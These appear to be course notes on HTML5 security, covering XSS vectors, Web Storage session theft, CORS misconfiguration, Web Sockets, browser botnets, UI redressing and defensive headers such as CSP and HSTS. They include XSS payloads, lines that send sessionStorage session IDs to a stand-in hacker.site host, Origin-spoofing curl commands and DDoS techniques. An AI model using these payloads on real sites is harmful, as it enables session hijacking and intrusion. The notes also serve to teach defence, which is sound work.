HTML5

Intro

We do not need to analyze the entire HTML5 specification and its related features. Instead, this recap explores the major features that are interesting from a security perspective.

Semantics

HTML5 enriches the semantics that web developers can give to their applications. The additions include new media elements, form types, attributes, and many others. From a security point of view, these become new attack vectors and ways to bypass security measures.

Form Elements

The keygen element is one of the new form elements. It was introduced to generate a key pair on the client side. The most interesting attribute it supports is autofocus, which is useful for triggering XSS without user interaction.

Example:

<form action="#" method="GET">
  Encryption: <keygen name="security" autofocus onfocus="alert(1);">
  <input type="submit">
</form>

Media Elements

Both <video> and <audio> are commonly used to evade XSS filters. In addition, <source>, <track> and <embed> are also useful because they support the 'src' attribute.

Example:

<embed src="http://hacker.site/evil.swf">
<embed src="javascript:alert(1)">

Semantic / Structural Elements

There are many other elements introduced to improve the semantic and the structure of a page, such as:

<article>
<figure>
<footer>
<header>
<main>
<mark>
<nav>
<progress>
<section>
<summary>
<time>

All of them support Global and Event Attributes, both old and new.

Attributes

There is a huge list of new events and some interesting examples are:

onhashchange
onformchange
onscroll
onresize
...

Example:

<body onhashchange="alert(1)">
  <a href="#"> Click me</a>

Offline & Storage

A real-world example of an offline web application is TiddlyWiki: http://tiddlywiki.com/

  • Some of the major features related to this evolution are Application Cache and Web Storage (also known as Client-Side Storage or Offline Storage).

Web Storage – Attack Scenarios

The attack scenarios may vary from Session Hijacking, User Tracking, Disclosure of Confidential Data, as well as a new way to store attack vectors.

Session Hijacking

If a developer chooses to store session IDs in sessionStorage instead of cookies, it is still possible to perform session hijacking by leveraging an XSS flaw.

new Image().src="http://hacker.site/SID?"+escape(sessionStorage.getItem('sessionID'));
// with cookies, this would have been document.cookie

Web Storage solutions do not implement security mechanisms to mitigate the risk of malicious access to the stored information (compare the HttpOnly flag for cookies).

Offline Web Application – Attack Scenarios

  • With Offline Web apps, the most critical security issue is Cache Poisoning.
  • Offline apps can also cache SSL resources and the root directory of a website.

Device Access

A feature introduced by the HTML5 specs is the Geolocation API:

→ http://www.w3.org/TR/geolocation-API/

This provides scripted access to a user's position based on GPS coordinates (latitude and longitude).

Geolocation – Attack Scenarios

Access to this API can be used not only for user tracking, both physical and cross-domain, but also for breaking anonymity.

Fullscreen Mode – Attack Scenario

Another API allows a single element (images, videos, etc.) to be viewed in full-screen mode.

→ https://dvcs.w3.org/hg/fullscreen/raw-file/tip/Overview.html

  • This API can be used for phishing attacks.
  • For example, an attacker can display a phishing page in full-screen mode, loading a fake copy of the victim website in the background together with an image that simulates the browser header, address bar, etc.

Performance, Integration & Connectivity

Many new features such as:

  • Drag and Drop, HTML editing and Workers (Web and Shared).

Improvements are also made on communications, with features such as:

  • WebSocket and XMLHttpRequest2.

Attack Scenarios

The attack scenarios include interactive XSS with Drag and Drop, Remote Shell, port scanning and web-based botnets exploiting the new communication features like WebSocket.

  • It is also possible to manipulate the history stack with methods to add and remove locations, thus allowing history tampering attacks.

From a security point of view, the most important features introduced are:

Content Security Policy
Cross-Origin Resource Sharing
Cross-Document Messaging
Strengthening of iframes with the sandbox attribute

- http://www.w3.org/TR/CSP/
- http://www.w3.org/TR/cors/
- https://html.spec.whatwg.org/multipage/web-messaging.html
- http://www.w3.org/TR/html5/embedded-content-0.html#attr-iframe-sandbox

Exploiting HTML5

This section covers the attack scenarios that may affect the most widespread technologies introduced by HTML5.

CORS Attack Scenarios

The same-origin restrictions came to be seen as more restrictive than helpful. In order to relax the SOP, a new specification was introduced: Cross-Origin Resource Sharing.

→ http://www.w3.org/TR/cors/

It uses a set of HTTP headers.

→ http://www.w3.org/TR/cors/#syntax

These allow both server and browser to communicate about which requests are or are not allowed.

Universal Allow

The first CORS header is Access-Control-Allow-Origin, which indicates whether a resource can be shared or not.

The decision is based on the header returning the value of the Origin request header, *, or null in the response:

Access-Control-Allow-Origin = "Access-Control-Allow-Origin" ":" origin-list-or-null | "*"

Allow by Wildcard Value *

Generally this is not a required behavior, but rather a matter of laziness on the part of the implementer. This is one of the most common misconfigurations with CORS headers.

How to abuse?

- If XSS is found on a page served with 'Access-Control-Allow-Origin: *', it can be used to infect or impersonate users.
- Trick users into visiting an attacker-controlled website that makes COR queries to their internal resources in order to read the responses.
- Use the users as a proxy to exploit vulnerabilities, leveraging the fact that the HTTP Referer header is often not logged.

Universal Allow

In CORS, the Access-Control-Allow-Credentials header indicates that the request can include user credentials. http://www.w3.org/TR/cors/#user-credentials

Allow by Server-side

Allowing COR from all domains with credentials included:

<?php
header('Access-Control-Allow-Origin: ' . $_SERVER['HTTP_ORIGIN']); // PHP concatenates strings with '.', not '+'
header('Access-Control-Allow-Credentials: true');

By design, this implementation allows CSRF.

Any origin will be able to read the anti-CSRF tokens from the page, thereby allowing any domain on the internet to impersonate the web application's users.
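A safer alternative to reflecting every Origin is an explicit allowlist. The following is a minimal sketch in JavaScript, not a drop-in fix for the PHP above: the function name corsHeadersFor and the allowlist contents are assumptions made for illustration.

```javascript
// Hypothetical allowlist; the origin is a placeholder taken from the examples in these notes.
const ALLOWED_ORIGINS = new Set(['http://friend.site']);

// Returns the CORS response headers for a given Origin request header value.
function corsHeadersFor(origin, allowed = ALLOWED_ORIGINS) {
  // Vary: Origin keeps shared caches from serving one origin's response to another.
  const headers = { Vary: 'Origin' };
  // Only an exact match against the allowlist gets credentialed access.
  if (typeof origin === 'string' && allowed.has(origin)) {
    headers['Access-Control-Allow-Origin'] = origin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return headers;
}

console.log(corsHeadersFor('http://friend.site'));
console.log(corsHeadersFor('http://hacker.site'));
```

An allowlist only limits which pages a browser will let read the response. It is not authentication, so sensitive resources still need a server-side session check.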

Weak Access Control

CORS specifications provide a request header named Origin. It indicates where the COR or Preflight Request originates from.

  • The header can be spoofed by creating requests outside of the browser. For example, one can use a proxy or a tool like cURL, Wget, etc.

Check Origin Example

Suppose that victim.site supports CORS and not only reveals sensitive information to friendly origins, but also reveals simple information to everyone.

By using cURL, it is possible to bypass the access control by setting the Origin header to the allowed value: friend.site.

In so doing, it is possible to read the sensitive information sent:

curl http://victim.site/html5/CORAaccessContro.php
# normal output

curl --header 'Origin: http://hacker.site' http://victim.site/...
# normal output

curl --header 'Origin: http://friend.site' http://victim.site/...
# sensitive information found

Intranet Scanning

It is also possible to abuse COR in order to perform time-based intranet scanning.

  • Send XHRs to either arbitrary IP addresses or domain names and, depending on the response time, establish whether a host is up or a specific port is open.

JS-Recon

It is an HTML5-based JavaScript network reconnaissance tool.

→ https://web.archive.org/web/20120313125925/http:/www.andlabs.org/tools/jsrecon/jsrecon.html

It uses features like COR and Web Sockets in order to perform both network and port scanning from the browser.

It is also useful for guessing users' private IP addresses.

Remote Web Shell

If an XSS flaw is found in an app that supports CORS, an attacker can hijack the victim's session, establishing a communication channel between the victim's browser and the attacker.

The Shell of the Future

→ https://web.archive.org/web/20150223205517/http:/www.andlabs.org/tools/sotf/sotf.html

It is a Reverse Web Shell handler. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser's address bar. It makes use of HTML5 Cross Origin Requests and can bypass anti-session hijacking measures like Http-Only cookies and IP address-Session ID binding…

Storage Attacks Scenarios

→ https://tools.ietf.org/html/rfc6265#section-6.1

Web Storage

It is the first stable HTML5 specification that governs two well-known mechanisms: Session Storage and Local Storage.

The implementations are similar to cookies and they are also known as key-value storage and DOM storage. Anything can be converted to a string or serialized and stored:

window.(localStorage|sessionStorage).setItem('name','Joao');
#         DOM properties                       Key     Value
  • http://www.w3.org/TR/webstorage/#security-storage

The main issue with this technology is that developers are not aware of the security concerns presented in this specification, which clearly reports the security risks this feature may introduce.

Session Hijacking

Web Storage is a property of the Window object; therefore, it is accessible via the DOM and, in the case of an XSS attack, it can be compromised in a similar fashion to cookies.

The exploitation is similar to the one used for cookies; the only difference is in the API used to retrieve the values:

<script> new Image().src = "http://hacker.site/C.php?cc=" + escape(sessionStorage.getItem('sessionID'));
</script>
  • HTTP cookies have attributes, such as HttpOnly, that were introduced to stop the session hijacking phenomenon.
  • This security measure, however, is completely missing for Web Storage technologies, making them completely inappropriate for storing both session identifiers and sensitive information.
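On the defensive side, the session identifier can stay in a cookie that scripts cannot read. The following is a minimal sketch of building such a Set-Cookie value. The function name buildSessionCookie is hypothetical, and the Secure and SameSite attributes are additions not discussed in these notes.

```javascript
// Builds a Set-Cookie header value for a session identifier.
// HttpOnly hides the cookie from document.cookie, so an XSS payload cannot read it.
// Secure and SameSite=Strict are extra hardening assumed for this sketch.
function buildSessionCookie(name, value) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    'Path=/',
    'HttpOnly',
    'Secure',
    'SameSite=Strict',
  ].join('; ');
}

console.log(buildSessionCookie('sessionID', 'abc123'));
// prints "sessionID=abc123; Path=/; HttpOnly; Secure; SameSite=Strict"
```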

Cross-Directory Attacks

Another important difference is that, unlike HTTP cookies, there is no feature to restrict the access by pathname, making the Web Storage content available in the whole origin. This may also introduce Cross-Directory attacks.

  • This is typical for various social networks, like Facebook, or universities.

Example:

  • If an XSS flaw is found in the university path uni.edu/~professorX, it is possible to read all stored data in all the directories available in the university domain uni.edu.
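The reason is that Web Storage is scoped by origin (scheme, host and port), and the path plays no part. The following is a small sketch of that comparison: the function name sharesWebStorage and the ~studentY path are made up for illustration.

```javascript
// Two URLs share Web Storage when their origins (scheme, host, port) match.
function sharesWebStorage(urlA, urlB) {
  const a = new URL(urlA).origin;
  const b = new URL(urlB).origin;
  // Opaque origins serialize to the string "null" and never share storage.
  return a !== 'null' && a === b;
}

// Different directories, same origin: storage is shared.
console.log(sharesWebStorage('http://uni.edu/~professorX/', 'http://uni.edu/~studentY/notes')); // true
// A different host is a different origin: storage is separate.
console.log(sharesWebStorage('http://uni.edu/', 'http://cs.uni.edu/')); // false
```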

User Tracking and Confidential Data Disclosure

It is possible to perform user tracking if websites use Web Storage objects, rather than HTTP cookies, to store information about users' behavior.

IndexedDB

When working with structured data, Web Storage does not provide an efficient mechanism to search over values.

To address these limitations, HTML5 introduced two options:

- IndexedDB - http://www.w3.org/TR/IndexedDB/
- Web SQL Database - http://www.w3.org/TR/webdatabase/
// the second was deprecated in 2010
  • Web SQL Database is a relational database access system, whereas IndexedDB is an indexed table system.
  • The Indexed Database API is an HTML5 API introduced for high-performance searches on client-side storage. The idea is that this storage would hold significant amounts of structured, indexed data, thereby giving developers an efficient client-side querying mechanism.
  • It is a transactional technology; however, it is not relational. The database system saves key-value pairs in object stores and allows searching data by using indexes, also known as keys.

  • The primary risks are related to information leakage and information spoofing.
  • IndexedDB follows the Same-Origin Policy but limits its use to HTTP and HTTPS in all browsers except Internet Explorer.

Internet Explorer also allows the ms-wwa and ms-wwa-web protocols for apps in the new Windows UI format.

Web Messaging Attack Scenarios

→ http://www.w3.org/TR/webmessaging/

This is also referred to as Cross Document Messaging or postMessage (the API name).

Communications between the embedded iframes and the hosting website are now possible.

DOM XSS

This occurs if the postMessage data received is used without validation in sinks such as innerHTML, document.write, etc.:

...
// Say Hello
var hello = document.getElementById("hellobox");
hello.innerHTML = "Hello "+e.data;
// HTMLElement Sink           User controlled values
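One way to close this sink is to treat the message as text rather than markup. In a browser, assigning to textContent instead of innerHTML is usually enough. Where HTML must be built by hand, an escaping helper can be sketched as below. The function name escapeHtml is an assumption for illustration, not part of any API mentioned in these notes.

```javascript
// Characters that can change HTML parsing, mapped to their entity equivalents.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escapes untrusted text so it can be placed inside HTML element content.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Simulated postMessage payload carrying an XSS vector.
const payload = '<img src=x onerror=alert(1)>';
console.log('Hello ' + escapeHtml(payload));
// prints "Hello &lt;img src=x onerror=alert(1)&gt;"
```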

Origin Issue

The Web Messaging protocol exposes the sender's origin through the origin field of each message event.

Checking the origin is not mandatory, but it can help reduce the attack surface by both limiting the interaction to trusted origins and reducing the likelihood of a client-side DoS:

if (e.origin != 'http://trusted.site'){
// Origin not allowed
return;
}
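The comparison has to be an exact match on the whole origin string. The sketch below contrasts an exact allowlist check with a prefix check that looks similar but can be bypassed. The names isTrustedOrigin and looseCheck and the trusted.site.hacker.site host are hypothetical.

```javascript
// Hypothetical allowlist of origins permitted to send messages.
const TRUSTED_ORIGINS = new Set(['http://trusted.site']);

// Exact match against the allowlist.
function isTrustedOrigin(origin) {
  return TRUSTED_ORIGINS.has(origin);
}

// A prefix check: bypassable by registering a host that starts with the trusted name.
function looseCheck(origin) {
  return origin.indexOf('http://trusted.site') === 0;
}

console.log(isTrustedOrigin('http://trusted.site'));             // true
console.log(isTrustedOrigin('http://trusted.site.hacker.site')); // false
console.log(looseCheck('http://trusted.site.hacker.site'));      // true (bypassed)
```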

Unlike the CORS Origin request header, which can be spoofed by creating requests outside the browser, the origin of a message event is set by the browser itself. The practical risk is a missing or loosely written origin check.

Web Sockets Attack Scenarios

→ http://tools.ietf.org/html/rfc6455

→ http://www.w3.org/TR/websockets/

HTML5 Web Sockets can provide a 500:1 or, depending on the size of the HTTP headers, even a 1000:1 reduction in unnecessary HTTP header traffic and a 3:1 reduction in latency.

That is not just an incremental improvement; that is a revolutionary jump.

If we are able to execute JavaScript code inside the victim's browser, it is possible to establish a Web Socket connection and perform our malicious operations.

Data validation

One of the simplest data validation issues to find may be XSS and, while looking for it, we might also find other types of injection affecting both the client side and the server side.

MiTM

The WebSocket Protocol standard defines two schemes for Web Socket connections:

ws  = unencrypted
wss = encrypted

If the implementation uses the unencrypted channel, we have a MiTM issue whereby anybody on the network can see and manipulate the traffic.
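The WebSocket schemes are ws (unencrypted) and wss (encrypted over TLS). A client or a review script can refuse plain-text endpoints before connecting, as in this small sketch. The function name isEncryptedWebSocketUrl and the /chat path are assumptions for illustration.

```javascript
// Returns true only for WebSocket URLs that use the TLS-protected wss: scheme.
function isEncryptedWebSocketUrl(url) {
  // The URL parser lowercases the scheme, so 'WSS://...' is handled as well.
  return new URL(url).protocol === 'wss:';
}

console.log(isEncryptedWebSocketUrl('wss://victim.site/chat')); // true
console.log(isEncryptedWebSocketUrl('ws://victim.site/chat'));  // false
```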

Remote Shell

If we are able to execute JavaScript code in the victim's browser, by either exploiting an XSS flaw or tricking the victim into visiting a malicious website, we could conveniently establish a full Web Socket connection and, as a result, have a Remote Shell active until the window/tab is closed.

Network Reconnaissance

A nice tool to test both scenarios is JS-Recon:

→ https://web.archive.org/web/20120313125925/http:/www.andlabs.org/tools/jsrecon/jsrecon.html

Web Workers Attack Scenarios

→ http://www.w3.org/TR/workers/

Web Workers are the solution, introduced by HTML5, to allow thread-like operations within web browsers. They allow most modern browsers to run JavaScript in the background.

Before Web Workers, methods like setTimeout, setInterval or even XMLHttpRequest provided a way to approximate parallelism by using thread-like messaging.

Two types:

Dedicated Web Workers: http://www.w3.org/TR/workers/#dedicated-workers-and-the-worker-interface
Shared Web Workers: http://www.w3.org/TR/workers/#shared-workers-and-the-sharedworker-interface
  • A dedicated worker can only be accessed through the script that created it, while a shared one can be accessed by any script from the same origin.
  • Web Workers did not introduce new threats, but increased the performance and feasibility of existing attacks.

Browser-Based Botnet

We can run the JavaScript code on all the browsers that support the features the bot uses. This includes any OS that can run a browser, even on televisions, gaming consoles, etc.

Two stages:

- 1. Infect the victims: XSS, email spam, social engineering...
- 2. Manage Persistence: the malicious code will work until the victim's browser is closed.

Sometimes, implementing a game can help us keep the victim on the malicious page. If the game is both interactive and especially addictive, the user may remain online the entire day.

With an HTML5 botnet, some of the possible attacks that can be performed are:

Email Spam
Distributed Password Cracking
DDoS Attacks
Phishing
Data Mining
Intranet Reconnaissance

Distributed Password Cracking

  • Ravan

→ http://web.archive.org/web/20160315031218/http:/www.andlabs.org/tools/ravan.html

A system based on WebWorkers to perform password cracking of MD5, SHA1, SHA256, SHA512 hashes.

WebWorkers + CORS - DDoS Attacks

By adding CORS, we could generate a large number of GET/POST requests to a remote website. We would be using COR requests to perform a DDoS attack.

  • We don't care if the response is blocked or wrong; we care about sending as many requests as possible.

To bypass the CORS limitation, add fake parameters in the query string. This forces the browser to treat each request as unique:

http://victim.site/dossable.php?search=X
X = use random values here

Security Measures

Security Headers: X-XSS-Protection

To protect against Reflected XSS attacks

Security Headers: X-Frame-Options

To prevent Clickjacking

  • This header introduced a way for the server to instruct the browser on whether to display the transmitted content in frames of other web pages.

Syntax:

X-Frame-Options: value

# DENY = the page cannot be displayed in a frame, regardless of the site attempting to do so.
# SAMEORIGIN = The page can only be displayed in a frame on the same origin as the page itself.
# ALLOW-FROM URI = The page can only be displayed in a frame on the specific origin.

Security Headers: Strict-Transport-Security (HSTS)

→ http://tools.ietf.org/html/rfc6797

It allows a server to declare itself accessible only via secure connections. It also allows users to direct their user agents to interact with given sites over secure connections only.

To enable this mechanism, the response header Strict-Transport-Security is required (it is not supported by all vendors).

→ http://caniuse.com/#feat=stricttransportsecurity

Syntax:

Strict-Transport-Security: max-age=<delta-seconds>; includeSubDomains

# max-age=31536000 keeps the policy cached for one year; includeSubDomains is optional
# max-age=0 removes the policy from the cache
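The header value can be assembled from its two parts, as in the following minimal sketch. The function name buildHstsHeader and its option names are assumptions for illustration.

```javascript
// Builds the value of the Strict-Transport-Security response header.
function buildHstsHeader({ maxAgeSeconds, includeSubDomains = false }) {
  if (!Number.isInteger(maxAgeSeconds) || maxAgeSeconds < 0) {
    throw new RangeError('maxAgeSeconds must be a non-negative integer');
  }
  const parts = [`max-age=${maxAgeSeconds}`];
  // includeSubDomains is an optional directive.
  if (includeSubDomains) parts.push('includeSubDomains');
  return parts.join('; ');
}

const ONE_YEAR = 365 * 24 * 60 * 60; // 31536000 seconds

console.log(buildHstsHeader({ maxAgeSeconds: ONE_YEAR, includeSubDomains: true }));
// prints "max-age=31536000; includeSubDomains"
console.log(buildHstsHeader({ maxAgeSeconds: 0 }));
// prints "max-age=0"
```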

Security Headers: X-Content-Type-Options

To indicate the type of a specific resource, web servers use the response header Content-Type, which contains a standard MIME type (text/html, image/png, etc.) with some optional parameters (such as the character set).

→ attack scenarios - http://blog.fox-it.com/2012/05/08/mime-sniffing-feature-or-vulnerability/

The most common is Content Sniffing XSS

→ http://www.adambarth.com/papers/2009/barth-caballero-song.pdf

  • This header instructs the browser not to guess the content type of the resource and to trust the Content-Type header.

Syntax:

X-Content-Type-Options: nosniff
// only works on IE and Chrome

Security Headers: Content Security Policy (CSP)

It is a defense mechanism that can significantly reduce the risk and impact of a broad class of content injection vulnerabilities. These include XSS and UI Redressing in modern browsers.

Headers adopted:

Content-Security-Policy (standard), plus the legacy X-Content-Security-Policy and X-WebKit-CSP

CSP uses a collection of directives in order to define a specific set of whitelisted sources of trusted content

→ http://www.w3.org/TR/CSP/#directives

The most common is script-src = http://www.w3.org/TR/CSP/#script-src:

 Content-Security-Policy: script-src 'self' https://other.web.site

//                   Directive Name      Values
// 1 Defines which scripts the protected resource can execute
// 2 the allowed sources of scripts

Directives work in default-allow mode. This simply means that if a specific directive does not have a policy defined, then it is equal to '*'; thus, every source is a valid source.

The default-src directive will be applied to all the unspecified directives:

Content-Security-Policy: default-src 'self'

With CSP, it is also possible to deny resources. For example, if the web app does not need plugins or to load frames, then the policy can be extended as follows:

Content-Security-Policy: default-src https://my.web.site;
object-src 'none'; frame-src 'none'
// 'none' returns an empty set for the allowed sources

CSP specification: http://www.w3.org/TR/CSP/

It defines the following directives:

default-src
script-src
object-src
style-src
img-src
media-src
frame-src
font-src
connect-src
report-uri // reporting feature
sandbox    // optional

There are four keywords that are also allowed:

none - no sources
self - current origin, but not its subdomains
unsafe-inline - allows inline JavaScript and CSS
unsafe-eval - allows text-to-JavaScript sinks like 'eval, Function, setTimeout, setInterval...'

// These keywords must be used with single quotes; otherwise they refer to servers named none, self, etc.
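Since forgetting the single quotes silently changes the meaning of a policy, the header value can be generated rather than typed by hand. The following is a minimal sketch: the function name buildCsp is hypothetical, and it assumes no real source host is literally named none, self, unsafe-inline or unsafe-eval.

```javascript
// Keywords that must be wrapped in single quotes inside a policy.
const CSP_KEYWORDS = new Set(['none', 'self', 'unsafe-inline', 'unsafe-eval']);

// Serializes { directive: [sources] } into a Content-Security-Policy value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => {
      // Quote keywords; leave hosts and URLs untouched.
      const values = sources.map((s) => (CSP_KEYWORDS.has(s) ? `'${s}'` : s));
      return [name, ...values].join(' ');
    })
    .join('; ');
}

console.log(buildCsp({
  'default-src': ['https://my.web.site'],
  'script-src': ['self', 'https://other.web.site'],
  'object-src': ['none'],
}));
// prints "default-src https://my.web.site; script-src 'self' https://other.web.site; object-src 'none'"
```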

Report violations mechanism:

Content-Security-Policy: default-src 'self'; report-uri /csp_report;
// once a violation is detected, the browser will perform a POST request to the path specified, sending a JSON object similar to the one below.

Example:

{
  "csp-report": {
    "document-uri":"http://my.web.site/page.html",
    "referrer":"http://hacker.site/",
    "blocked-uri":"https://hacker.site/xss_test.js",
    "violated-directive":"script-src 'self'",
    "original-policy":"script-src 'self'; report-uri http://my.web.site/csp_report"
  }
}
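On the receiving end, the report endpoint only needs to parse this JSON and keep the fields it cares about. The following is a minimal sketch of that step: the function name summarizeCspReport and the shape of the summary object are assumptions for illustration.

```javascript
// Extracts the page, blocked resource and violated directive name from a report body.
function summarizeCspReport(jsonText) {
  const report = JSON.parse(jsonText)['csp-report'];
  if (!report) throw new Error('missing "csp-report" object');
  return {
    page: report['document-uri'],
    blocked: report['blocked-uri'],
    // "script-src 'self'" -> "script-src"
    directive: String(report['violated-directive'] || '').split(' ')[0],
  };
}

// Sample body mirroring the report shown above.
const sample = JSON.stringify({
  'csp-report': {
    'document-uri': 'http://my.web.site/page.html',
    'referrer': 'http://hacker.site/',
    'blocked-uri': 'https://hacker.site/xss_test.js',
    'violated-directive': "script-src 'self'",
    'original-policy': "script-src 'self'; report-uri http://my.web.site/csp_report",
  },
});

console.log(summarizeCspReport(sample));
```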

CSP Playground

To test CSP options

http://www.cspplayground.com/

UI Redressing - The x-Jacking Art

A category of attacks that aim to change visual elements in a user interface in order to conceal malicious activities.

Examples include:

- Overlaying a visible button with an invisible one
- Changing the cursor position
- Manipulating other elements in the user interface

These attacks are also known as ClickJacking, LikeJacking, StrokeJacking, FileJacking and others.

ClickJacking

This attack uses a nested iframe from a target website and a little bit of CSS magic.

The bait is a submission button, or whatever the attacker chooses, that triggers an action.

For example: **find willie**, which triggers the attack when clicked.

LikeJacking

→ http://nakedsecurity.sophos.com/2010/05/31/facebook-likejacking-worm/

  • The targets are social networks and their features.
  • Likes are perceived as a sign of popularity and quality nowadays, so there are ways to buy likes to give the public this false perception.

StrokeJacking

→ http://seclists.org/fulldisclosure/2010/Mar/232

This technique for hijacking keystrokes is proof that UI Redressing is not only about hijacking clicks.

Example:

http://blog.andlabs.org/2010/04/stroke-triggered-xss-and-strokejacking_06.html

New Attack Vectors in HTML5

Drag-and-Drop:

  • With HTML5, the drag-and-drop mechanism has been transformed into something natively supported by all desktop-based browsers.

Text Field Injection

The first technique allows attacker-controlled data to be dragged into hidden text fields/forms on different origins.

→ http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html

Content Extraction

This technique allows us to extract content from areas we cannot access (restricted areas). In this scenario, we must trick the victim into dragging their private data into areas under our control.

  • In order to trick the victim so we can extract content from the targeted web page, we must know what to extract and where it is located.

If the secret is part of a URL, an HTML anchor element or an image, dragging is easy because the element will be converted into a serialized URL.

  • It is difficult when the content is not draggable, like textual content, so we need to trick the victim into selecting it before dragging.

We could use the view-source: pseudo-protocol to load the HTML source code into an iframe.

Example:

<iframe src="view-source:http://victim.site/secretInfo/"></iframe>

However, this technique only works on Firefox without the NoScript add-on.